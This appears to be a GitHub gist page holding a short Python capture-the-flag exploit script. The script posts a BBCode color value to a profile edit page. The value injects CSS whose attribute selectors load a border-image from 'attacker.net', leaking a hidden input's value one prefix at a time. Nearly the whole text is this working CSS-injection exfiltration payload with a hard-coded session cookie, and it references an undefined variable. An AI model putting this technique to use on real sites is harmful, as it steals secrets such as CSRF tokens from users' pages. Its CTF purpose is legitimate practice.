Skip to content

Instantly share code, notes, and snippets.

@rioru
Last active August 27, 2017 18:28
Show Gist options
  • Save rioru/8dd25be546c6bbcb3974c8deb549224c to your computer and use it in GitHub Desktop.
Save rioru/8dd25be546c6bbcb3974c8deb549224c to your computer and use it in GitHub Desktop.
h4ck1t
from pwn import *
from requests import *
import string
import sys
import time
def edit(s, cookie, bla):
s.post("http://tasks.ctf.com.ua:13373/edit.php", cookies=cookie, data={"about": bla})
s = Session()
cookie = {"PHPSESSID": "85gdkck3eegdmu215o02ac8rq0"}
bla = '''[color="test;} input[value^="'''+sys.argv[1]+'''" i]{border-image: url('http://attacker.net/?a='''+ sys.argv[1]+'''"]a[/color]'''
log.info("Sending [%s, %s]" % (i, bla))
edit(s, cookie, bla)
edit(s, cookie, bla)
r = s.get("http://tasks.ctf.com.ua:13373/profile.php", cookies=cookie)
print r.text
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment